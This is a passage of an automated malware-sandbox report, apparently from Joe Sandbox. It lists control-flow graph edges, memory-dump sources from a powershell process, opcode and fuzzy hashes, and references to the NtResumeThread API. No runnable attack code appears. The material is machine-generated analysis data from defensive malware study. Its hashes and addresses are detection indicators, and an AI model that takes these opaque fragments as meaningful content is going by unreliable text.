2119 765060d-7650616 2089->2119 2133 765065a-7650665 2089->2133 2103 7650668 2090->2103 2108 76507c2 2091->2108 2115 765076b-7650774 2092->2115 2126 76507b3-76507bc 2092->2126 2093->2103 2104 7650715 2094->2104 2110 76505b7 2095->2110 2096->2104 2097->2110 2114 76506be-76506c7 2098->2114 2123 7650706-765070f 2098->2123 2099->2108 2101->2102 2106 7650577 2102->2106 2107 765057e-765057f 2102->2107 2103->2114 2104->2115 2106->2086 2106->2089 2106->2090 2106->2091 2106->2092 2106->2093 2106->2094 2106->2095 2106->2096 2106->2097 2106->2098 2106->2099 2106->2107 2107->2095 2128 76507c3 2108->2128 2110->2119 2111->2112 2120 7650454-7650455 2112->2120 2121 7650457-7650497 2112->2121 2131 76506d0-76506d1 2114->2131 2132 76506c9 2114->2132 2124 7650776 2115->2124 2125 765077d-765077e 2115->2125 2118->2102 2129 765061f-7650620 2119->2129 2130 7650618 2119->2130 2120->2121 2121->2080 2136 7650499-765049f 2121->2136 2123->2114 2124->2091 2124->2092 2124->2099 2125->2091 2125->2092 2126->2115 2127->2064 2128->2128 2129->2089 2129->2093 2130->2089 2130->2090 2130->2091 2130->2092 2130->2093 2130->2094 2130->2096 2130->2098 2130->2099 2131->2094 2131->2098 2132->2091 2132->2092 2132->2094 2132->2096 2132->2098 2132->2099 2133->2119 2136->2080
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Te^q
                                                                                                    • API String ID: 0-671973202
                                                                                                    • Opcode ID: 39f410aae2a320017d35e69e66c20dcfc0c840bfbd59c23484c518ae2a72f13e
                                                                                                    • Instruction ID: 12ecd0a4cf5dc0768f57b66aadbc3df585b4835fa0cc51f0279daaa886f3ead3
                                                                                                    • Opcode Fuzzy Hash: 39f410aae2a320017d35e69e66c20dcfc0c840bfbd59c23484c518ae2a72f13e
                                                                                                    • Instruction Fuzzy Hash: 8B1249B4E01229CFDB64CF69D944B9ABBF2FB89300F1080AAD90AA7351D7709D85DF41

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2137 7650040-765006b 2138 7650072-76500bf 2137->2138 2139 765006d 2137->2139 2142 76500c2-76500c8 2138->2142 2139->2138 2143 76500d1-76500d2 2142->2143 2144 76500ca 2142->2144 2145 76500d4-76500e0 2143->2145 2144->2143 2144->2145 2146 7650176-7650245 2144->2146 2147 7650256-76502be 2144->2147 2148 76500e1-76500f1 2144->2148 2149 7650132-7650162 2144->2149 2150 7650322-765038c 2144->2150 2151 765039f-76503e4 2144->2151 2152 76502cf-765030f 2144->2152 2170 7650164-765016a 2146->2170 2233 765024b-7650251 2146->2233 2147->2170 2183 76502c4-76502ca 2147->2183 2166 76500fd-7650128 2148->2166 2149->2170 2150->2170 2182 7650392-765039a 2150->2182 2167 76503e6-76503ec 2151->2167 2168 76503ee-76503f3 2151->2168 2169 7650315-765031d 2152->2169 2152->2170 2166->2142 2171 765012a-7650130 2166->2171 2167->2168 2172 76503f5-76503f6 2168->2172 2173 76503f8-7650443 2168->2173 2169->2170 2174 7650173-7650174 2170->2174 2175 765016c 2170->2175 2171->2142 2172->2173 2217 7650445-765044b 2173->2217 2218 765044d-7650452 2173->2218 2174->2146 2175->2146 2175->2147 2175->2150 2175->2151 2175->2152 2175->2174 2179 76504b3-76504fa 2175->2179 2180 76504fc-765051f 2175->2180 2181 765052e-765054b 2175->2181 2186 76504a1-76504a7 2179->2186 2180->2186 2187 7650521-7650529 2180->2187 2192 7650581-76505a9 2181->2192 2193 765054d-7650563 2181->2193 2182->2170 2183->2170 2189 76504b0-76504b1 2186->2189 2190 76504a9 2186->2190 2187->2186 2189->2179 2190->2179 2190->2180 2190->2181 2190->2189 2190->2192 2195 7650625-7650658 2190->2195 2196 7650667 2190->2196 2197 76507c1 2190->2197 2198 7650780-76507b1 2190->2198 2199 7650622-7650623 2190->2199 2200 7650714 2190->2200 2201 76505b6 2190->2201 2202 7650711-7650712 2190->2202 2203 76505b3-76505b4 2190->2203 2204 76506d3-7650704 2190->2204 2205 76507be-76507bf 2190->2205 2208 765056f-7650575 2192->2208 2224 76505ab-76505b1 2192->2224 2207 7650565-765056d 2193->2207 2193->2208 2225 765060d-7650616 2195->2225 2239 765065a-7650665 2195->2239 2209 7650668 2196->2209 2214 76507c2 2197->2214 2221 765076b-7650774 2198->2221 2232 76507b3-76507bc 2198->2232 2199->2209 2210 7650715 2200->2210 2216 76505b7 2201->2216 2202->2210 2203->2216 2220 76506be-76506c7 2204->2220 2229 7650706-765070f 2204->2229 2205->2214 2207->2208 2212 7650577 2208->2212 2213 765057e-765057f 2208->2213 2209->2220 2210->2221 2212->2192 2212->2195 2212->2196 2212->2197 2212->2198 2212->2199 2212->2200 2212->2201 2212->2202 2212->2203 2212->2204 2212->2205 2212->2213 2213->2201 2234 76507c3 2214->2234 2216->2225 2217->2218 2226 7650454-7650455 2218->2226 2227 7650457-7650497 2218->2227 2237 76506d0-76506d1 2220->2237 2238 76506c9 2220->2238 2230 7650776 2221->2230 2231 765077d-765077e 2221->2231 2224->2208 2235 765061f-7650620 2225->2235 2236 7650618 2225->2236 2226->2227 2227->2186 2242 7650499-765049f 2227->2242 2229->2220 2230->2197 2230->2198 2230->2205 2231->2197 2231->2198 2232->2221 2233->2170 2234->2234 2235->2195 2235->2199 2236->2195 2236->2196 2236->2197 2236->2198 2236->2199 2236->2200 2236->2202 2236->2204 2236->2205 2237->2200 2237->2204 2238->2197 2238->2198 2238->2200 2238->2202 2238->2204 2238->2205 2239->2225 2242->2186
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Te^q
                                                                                                    • API String ID: 0-671973202
                                                                                                    • Opcode ID: aaa49a6a8ee745bf21f1acbd3ffebb1fb9aec095a6af65f60fd1dc39fb7ca9fe
                                                                                                    • Instruction ID: ffa25135c21c60c7c9a8728add7152b8d63e0e6b8c091d5b461c8088d8a027ac
                                                                                                    • Opcode Fuzzy Hash: aaa49a6a8ee745bf21f1acbd3ffebb1fb9aec095a6af65f60fd1dc39fb7ca9fe
                                                                                                    • Instruction Fuzzy Hash: 4C0218B4E05229CFDB64CF69D944BAAB7F2FB89300F1081A9D90AA7350D7709D86DF41
                                                                                                    APIs
                                                                                                    • NtResumeThread.NTDLL(?,?), ref: 076C0C46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632567706.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 536e8b299ef935f1c2f414d34053ff813ae5643045135a7c69246f7a9609b4a4
                                                                                                    • Instruction ID: fc4ee86b2483bdf7020efc67c0b9aced470390462fd1392da0b93237ba3c3598
                                                                                                    • Opcode Fuzzy Hash: 536e8b299ef935f1c2f414d34053ff813ae5643045135a7c69246f7a9609b4a4
                                                                                                    • Instruction Fuzzy Hash: 062136B5D002098FDB10DFAAC5856EEFBF4EF88320F10842ED459A7250CB74A945CFA1
                                                                                                    APIs
                                                                                                    • NtResumeThread.NTDLL(?,?), ref: 076C0C46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632567706.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 2508862e27e9ccedb0578816035320a0d2186e534943cc172ce9e82b651bed4f
                                                                                                    • Instruction ID: 24ee126c3b9d01eddb90ff7fe80d8112dc7913b56397e1629de6ba415ae4d97a
                                                                                                    • Opcode Fuzzy Hash: 2508862e27e9ccedb0578816035320a0d2186e534943cc172ce9e82b651bed4f
                                                                                                    • Instruction Fuzzy Hash: 071114B1D002099FDB10DFAAC484AAEFBF4EF88320F10842ED459A7210CB74A945CFA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631496233.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: T3K%
                                                                                                    • API String ID: 0-462380713
                                                                                                    • Opcode ID: 4570b0f80772c40016288049f0f15da908ec358cf1b63d24e8813245b006abe9
                                                                                                    • Instruction ID: 05cf6e2ee123c30df9657ac323e79915081f7c37f19545023df4b2b90c884789
                                                                                                    • Opcode Fuzzy Hash: 4570b0f80772c40016288049f0f15da908ec358cf1b63d24e8813245b006abe9
                                                                                                    • Instruction Fuzzy Hash: B87137B4E01219DFDB44CFA8E588AAEB7F2FB48314F504069E506AB351DB306D85CF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600244599.0000000003650000.00000040.00000800.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8909f368423e06bb3fe716f6497651ec1bba363fcaac77d4054535fab3525d59
                                                                                                    • Instruction ID: c6062978986fa834ab42a68d6b89a2e3e73fed4049ed59a733f414cede711e82
                                                                                                    • Opcode Fuzzy Hash: 8909f368423e06bb3fe716f6497651ec1bba363fcaac77d4054535fab3525d59
                                                                                                    • Instruction Fuzzy Hash: 77820834A01259EFCB15CFA8D584A9DFBF2BF49310F288169E844AB365C735ED85CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632294203.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3889a74e998a5b29f88c63047d505b1ae1442297b1f13d8e870d0699bc088b7c
                                                                                                    • Instruction ID: 067a0d571c13bcafe2c647ff5658a40eabc03588a9b312e14f426cebdcbb9ccb
                                                                                                    • Opcode Fuzzy Hash: 3889a74e998a5b29f88c63047d505b1ae1442297b1f13d8e870d0699bc088b7c
                                                                                                    • Instruction Fuzzy Hash: A9D1F3B4D0525CCFDBA0EFA9C944BDDBBB1AB49304F5081AAD40EAB355DB745A89CF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632294203.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9dbce21dda220597b2af2ac46df02c1c9bfdbd00614bcc426c6e615b3efd8959
                                                                                                    • Instruction ID: 213b3d4485546ff2db69a188d555ca39cbf8ad2a0b1c660d0a0169c1ee7be779
                                                                                                    • Opcode Fuzzy Hash: 9dbce21dda220597b2af2ac46df02c1c9bfdbd00614bcc426c6e615b3efd8959
                                                                                                    • Instruction Fuzzy Hash: 18C104B4D0525CCFDBA0EFA9C944BDDBBB1AB49304F5081AAD40EAB355DB345A89CF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631496233.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 994e1c2337fafd47e8ab0daa03aa30000632a488a47657d6f6ef47066e34b65f
                                                                                                    • Instruction ID: c64ba1560cc645349b028fe727d3b4558b933d090d187c3bdb1c2f5a9c19fb76
                                                                                                    • Opcode Fuzzy Hash: 994e1c2337fafd47e8ab0daa03aa30000632a488a47657d6f6ef47066e34b65f
                                                                                                    • Instruction Fuzzy Hash: A751C370B10116CFC748DB78C158AAEB7F2AFC9260F5D846AD507DB391EE309846CB92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631496233.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b909234dc1d2d94809f25afc47e7f00cb66f9f29605a40e96356eaedffb0ed5f
                                                                                                    • Instruction ID: 1bfb95223dd3a227001f78a7ad939cfff59e58b0af6081c44fe8f3fec6287f8c
                                                                                                    • Opcode Fuzzy Hash: b909234dc1d2d94809f25afc47e7f00cb66f9f29605a40e96356eaedffb0ed5f
                                                                                                    • Instruction Fuzzy Hash: BF41A3B0B14116DFC744DB78D158A7A73E2AFD96A0F4D80BAD407DB391EE309806CB92

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 632 4e227ad-4e227b0 633 4e227b2-4e227b4 632->633 634 4e227b6-4e22846 632->634 633->634 640 4e229e2-4e22a03 634->640 641 4e2284c-4e22866 634->641 642 4e22a32-4e22ade 640->642 643 4e22a05-4e22a2a 640->643 644 4e22895-4e228a2 641->644 645 4e22868-4e2288d 641->645 670 4e22ee2-4e22f0d 642->670 671 4e22ae4-4e22b24 642->671 643->642 646 4e228a8-4e228c9 644->646 647 4e2299c-4e229dd 644->647 645->644 646->647 653 4e228cf-4e2299a 646->653 647->640 653->640 683 4e22f12-4e22f5f 670->683 671->670 678 4e22b2a-4e22b4b 671->678 681 4e22b65-4e22b67 678->681 682 4e22b4d-4e22b53 678->682 685 4e22b81-4e22ba9 681->685 686 4e22b69-4e22b6f 681->686 687 4e22b57-4e22b63 682->687 688 4e22b55 682->688 685->670 697 4e22baf-4e22bd0 685->697 689 4e22b73-4e22b7f 686->689 690 4e22b71 686->690 687->681 688->681 689->685 690->685 700 4e22bd2-4e22bd8 697->700 701 4e22bea-4e22bec 697->701 702 4e22bda 700->702 703 4e22bdc-4e22be8 700->703 704 4e22c06-4e22c31 701->704 705 4e22bee-4e22bf4 701->705 702->701 703->701 704->670 712 4e22c37-4e22c3c 704->712 706 4e22bf6 705->706 707 4e22bf8-4e22c04 705->707 706->704 707->704 713 4e22c54-4e22c67 712->713 714 4e22c3e-4e22c44 712->714 713->670 717 4e22c6d-4e22c72 713->717 715 4e22c46 714->715 716 4e22c48-4e22c52 714->716 715->713 716->713 718 4e22c74-4e22c7a 717->718 719 4e22c8a-4e22ca2 717->719 721 4e22c7e-4e22c88 718->721 722 4e22c7c 718->722 719->670 723 4e22ca8-4e22cb3 719->723 721->719 722->719 724 4e22cb5-4e22cbb 723->724 725 4e22ccb-4e22ce3 723->725 726 4e22cbf-4e22cc9 724->726 727 4e22cbd 724->727 725->670 728 4e22ce9-4e22cf0 725->728 726->725 727->725 730 4e22cf2-4e22cf8 728->730 731 4e22d08-4e22d5d 728->731 733 4e22cfa 730->733 734 4e22cfc-4e22d06 730->734 731->670 739 4e22d63-4e22d88 731->739 733->731 734->731 739->670 741 4e22d8e-4e22e95 739->741 741->670 754 4e22e97-4e22eb3 741->754 756 4e22ebd-4e22ee0 754->756 756->683
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600395362.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4e20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$Pq^q
                                                                                                    • API String ID: 0-653376292
                                                                                                    • Opcode ID: 86755b21985ef992482134c1351a72274fa7a4b6af528d8d0c8d5592ca51bb36
                                                                                                    • Instruction ID: 749177b3e67cf71041e00c936875b160580e72ee982c34c0d56ce113bfc41101
                                                                                                    • Opcode Fuzzy Hash: 86755b21985ef992482134c1351a72274fa7a4b6af528d8d0c8d5592ca51bb36
                                                                                                    • Instruction Fuzzy Hash: 2C227C34B402148FDB64DB18C951BA9BBB2BF98304F54C4D9D909AF365CB72ED868F81

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 759 4e28d34-4e28d37 760 4e28d39 759->760 761 4e28d3d-4e28d97 call 7d5884d 759->761 760->761 762 4e2ae81-4e2aeca 760->762 767 4e28d99-4e28dda 761->767 775 4e2aecf-4e2af87 762->775 774 4e28de0-4e28e03 767->774 767->775 780 4e28e09-4e28e1b 774->780 781 4e28e24-4e28e48 780->781 782 4e28e1d 780->782 784 4e28e77-4e28ee4 781->784 785 4e28e4a-4e28e6f 781->785 782->781 783 4e28eeb-4e28f0f 782->783 786 4e28f11-4e28f36 783->786 787 4e28f3e-4e28f7b 783->787 784->783 785->784 786->787 795 4e28f82-4e28f8f 787->795 797 4e28f95-4e28fc8 795->797 798 4e2ac2c-4e2ac75 795->798 801 4e28ff7-4e29004 797->801 802 4e28fca-4e28fef 797->802 798->780 801->798 803 4e2900a-4e29060 801->803 802->801 803->798 810 4e29066-4e290d1 803->810 817 4e290d7-4e29112 810->817 818 4e296c8-4e296ec 810->818 826 4e29141-4e2914e 817->826 827 4e29114-4e29139 817->827 819 4e2971b-4e29728 818->819 820 4e296ee-4e29713 818->820 819->798 821 4e2972e-4e2977d 819->821 820->819 836 4e29783-4e29785 821->836 837 4e2ac7a-4e2ad32 821->837 829 4e29154-4e2917c 826->829 830 4e294bc-4e29505 826->830 827->826 829->830 835 4e29182-4e291aa 829->835 870 4e295a3-4e295bd 830->870 835->830 846 4e291b0-4e29206 835->846 839 4e2978b-4e2979d 836->839 842 4e2ad61-4e2ad96 837->842 843 4e2ad34-4e2ad59 837->843 844 4e297a6-4e297ca 839->844 845 4e2979f 839->845 842->762 861 4e2ad9c-4e2adca 842->861 843->842 848 4e297f9-4e29859 844->848 849 4e297cc-4e297f1 844->849 845->844 847 4e29860-4e29884 845->847 846->830 872 4e2920c-4e292a4 846->872 853 4e298b3-4e298c0 847->853 854 4e29886-4e298ab 847->854 848->847 849->848 857 4e298c6-4e298f4 853->857 858 4e2abdc-4e2ac25 853->858 854->853 857->858 871 4e298fa-4e29928 857->871 858->839 861->762 869 4e2add0-4e2ae42 861->869 905 4e2ae70-4e2ae76 869->905 906 4e2ae44-4e2ae5f 869->906 874 4e295bf-4e295e4 870->874 875 4e295ec-4e29621 870->875 871->858 882 4e2992e-4e2995c 871->882 872->830 904 4e292aa-4e2933e 872->904 874->875 875->798 886 4e29627-4e2964b 875->886 882->858 892 4e29962-4e29a3f 882->892 886->798 895 4e29651-4e296ad 886->895 926 4e29d05-4e29d29 892->926 927 4e29a45-4e29a5f 892->927 918 4e296c3 895->918 919 4e296af-4e296be 895->919 904->870 928 4e29344-4e2935e 904->928 905->762 918->795 919->795 929 4e29d2b-4e29d50 926->929 930 4e29d58-4e29e6e 926->930 931 4e29a61-4e29a86 927->931 932 4e29a8e-4e29a9b 927->932 935 4e29360 928->935 936 4e29367-4e2938b 928->936 929->930 978 4e2a0d1-4e2a0ff 930->978 979 4e29e74-4e29e8e 930->979 931->932 933 4e29aa1-4e29ae5 932->933 934 4e29cbc-4e29d00 932->934 933->934 953 4e29aeb-4e29b0b 933->953 934->926 935->936 937 4e29412-4e29436 935->937 938 4e294b7 935->938 939 4e293ba-4e2940b 936->939 940 4e2938d-4e293b2 936->940 937->818 944 4e2943c-4e29469 937->944 938->870 939->937 940->939 944->818 953->934 962 4e29b11-4e29b44 953->962 962->934 969 4e29b4a-4e29baa 962->969 969->934 976 4e29bb0-4e29c5e 969->976 976->934 998 4e29c60-4e29cba 976->998 996 4e2a104-4e2a154 978->996 984 4e29e90-4e29e9c 979->984 985 4e29eb8 979->985 987 4e29ea6-4e29eac 984->987 988 4e29e9e-4e29ea4 984->988 989 4e29ebe-4e29f0c 985->989 991 4e29eb6 987->991 988->991 989->978 1001 4e29f12-4e29f27 989->1001 991->989 996->858 998->926 1007 4e29f41-4e29f76 1001->1007 1008 4e29f29-4e29f2f 1001->1008 1007->978 1017 4e29f7c-4e29f9c 1007->1017 1009 4e29f33-4e29f3f 1008->1009 1010 4e29f31 1008->1010 1009->1007 1010->1007 1017->978 1019 4e29fa2-4e2a086 1017->1019 1019->978 1030 4e2a088-4e2a0cf 1019->1030 1030->996
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600395362.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4e20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                    • API String ID: 0-1420252700
                                                                                                    • Opcode ID: 3df8a04f77a4c4e69a7c4883d7c3f007a8e0fd08a3c2e832cfc4644f53c9f3a0
                                                                                                    • Instruction ID: b490ceeabee4f2b9352f3dc2bbf9451567cef5608bcc3311f69f70f22c24dd77
                                                                                                    • Opcode Fuzzy Hash: 3df8a04f77a4c4e69a7c4883d7c3f007a8e0fd08a3c2e832cfc4644f53c9f3a0
                                                                                                    • Instruction Fuzzy Hash: A8C231B4A002188FDB64DB18CD51B99BBB2FB84304F5095E9DA09AF351CB71ED86CF91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1036 4e2d94c-4e2d94f 1037 4e2d951-4e2d953 1036->1037 1038 4e2d955-4e2d95d 1036->1038 1037->1038 1039 4e2d975-4e2d979 1038->1039 1040 4e2d95f-4e2d965 1038->1040 1043 4e2da9f-4e2daa9 1039->1043 1044 4e2d97f-4e2d983 1039->1044 1041 4e2d967 1040->1041 1042 4e2d969-4e2d973 1040->1042 1041->1039 1042->1039 1045 4e2dab7-4e2dabd 1043->1045 1046 4e2daab-4e2dab4 1043->1046 1047 4e2d9c3 1044->1047 1048 4e2d985-4e2d996 1044->1048 1051 4e2dac3-4e2dacf 1045->1051 1052 4e2dabf-4e2dac1 1045->1052 1049 4e2d9c5-4e2d9c7 1047->1049 1057 4e2daf7-4e2db31 1048->1057 1058 4e2d99c-4e2d9a1 1048->1058 1049->1043 1053 4e2d9cd-4e2d9d1 1049->1053 1055 4e2dad1-4e2daf4 1051->1055 1052->1055 1053->1043 1056 4e2d9d7-4e2d9db 1053->1056 1056->1043 1061 4e2d9e1-4e2da02 1056->1061 1068 4e2db33 1057->1068 1069 4e2db38-4e2db3f 1057->1069 1062 4e2d9a3-4e2d9a9 1058->1062 1063 4e2d9b9-4e2d9c1 1058->1063 1061->1043 1075 4e2da08-4e2da0c 1061->1075 1065 4e2d9ab 1062->1065 1066 4e2d9ad-4e2d9b7 1062->1066 1063->1049 1065->1063 1066->1063 1068->1069 1072 4e2db41 1069->1072 1073 4e2db46-4e2db5e 1069->1073 1072->1073 1077 4e2db62-4e2db96 1073->1077 1078 4e2db60 1073->1078 1079 4e2da0e-4e2da17 1075->1079 1080 4e2da2f 1075->1080 1086 4e2db98 1077->1086 1087 4e2db9d-4e2dba4 1077->1087 1078->1077 1083 4e2da19-4e2da1c 1079->1083 1084 4e2da1e-4e2da2b 1079->1084 1082 4e2da32-4e2da3f 1080->1082 1091 4e2da45-4e2da9c 1082->1091 1085 4e2da2d 1083->1085 1084->1085 1085->1082 1086->1087 1089 4e2dba6 1087->1089 1090 4e2dbab-4e2dbec 1087->1090 1089->1090 1094 4e2dbed-4e2dbf9 1090->1094 1095 4e2dc00-4e2dc07 1094->1095 1096 4e2dbfb 1094->1096 1097 4e2dc09 1095->1097 1098 4e2dc0e-4e2dc32 1095->1098 1096->1095 1097->1098 1100 4e2dc34-4e2dc36 1098->1100 1101 4e2dc7a-4e2dcb9 1098->1101 1102 4e2dc38-4e2dc3a 1100->1102 1103 4e2dc3c-4e2dc40 1100->1103 1106 4e2dcc0-4e2dcc7 1101->1106 1107 4e2dcbb 1101->1107 1102->1103 1103->1094 1105 4e2dc42-4e2dc59 1103->1105 1108 4e2dc60-4e2dc67 1105->1108 1109 4e2dc5b 1105->1109 1110 4e2dcc9 1106->1110 1111 4e2dcce-4e2dcf6 1106->1111 1107->1106 1112 4e2dc69 1108->1112 1113 4e2dc6e-4e2dc79 1108->1113 1109->1108 1110->1111 1115 4e2dcf8-4e2dcfa 1111->1115 1116 4e2dcfc-4e2dd1e 1111->1116 1112->1113 1113->1101 1115->1116 1117 4e2dd20 1116->1117 1118 4e2dd25-4e2dd2c 1116->1118 1117->1118 1119 4e2dd33-4e2dd81 1118->1119 1120 4e2dd2e 1118->1120 1122 4e2dd83 1119->1122 1123 4e2dd88-4e2dd8f 1119->1123 1120->1119 1122->1123 1124 4e2dd91 1123->1124 1125 4e2dd96-4e2ddcb 1123->1125 1124->1125 1127 4e2ddcd-4e2dde1 1125->1127 1128 4e2dde3 1127->1128 1129 4e2dde8-4e2ddef 1127->1129 1128->1129 1130 4e2ddf1 1129->1130 1131 4e2ddf6-4e2de2c 1129->1131 1130->1131 1131->1127 1133 4e2de2e-4e2de41 1131->1133 1134 4e2de43 1133->1134 1135 4e2de48-4e2de4f 1133->1135 1134->1135 1136 4e2de51 1135->1136 1137 4e2de56-4e2dea1 1135->1137 1136->1137 1139 4e2dea3 1137->1139 1140 4e2dea8-4e2deaf 1137->1140 1139->1140 1141 4e2deb1 1140->1141 1142 4e2deb6-4e2dede 1140->1142 1141->1142 1144 4e2dee0-4e2dee2 1142->1144 1145 4e2dee4-4e2df06 1142->1145 1144->1145 1146 4e2df08 1145->1146 1147 4e2df0d-4e2df14 1145->1147 1146->1147 1148 4e2df16 1147->1148 1149 4e2df1b-4e2df46 1147->1149 1148->1149 1151 4e2df48-4e2df4a 1149->1151 1152 4e2df4c-4e2df69 1149->1152 1151->1152 1154 4e2df70-4e2df77 1152->1154 1155 4e2df6b 1152->1155 1156 4e2df79 1154->1156 1157 4e2df7e-4e2dfa4 1154->1157 1155->1154 1156->1157
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600395362.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4e20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (o^q$(o^q$0l)r
                                                                                                    • API String ID: 0-1456055601
                                                                                                    • Opcode ID: c178c1700351a06adc18f4b5952adf1b6170f25bbc5e7f91e7d1604a5412ae52
                                                                                                    • Instruction ID: 5aa3514882a2a4ceafd6545aff4d38a651e255755ddccd6c0a2395cbfbaf44c0
                                                                                                    • Opcode Fuzzy Hash: c178c1700351a06adc18f4b5952adf1b6170f25bbc5e7f91e7d1604a5412ae52
                                                                                                    • Instruction Fuzzy Hash: 1422F570A09395AFD716CB78CC59FEA7F75AF46314F19419AF2408F2E2C6B4A804CB61

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
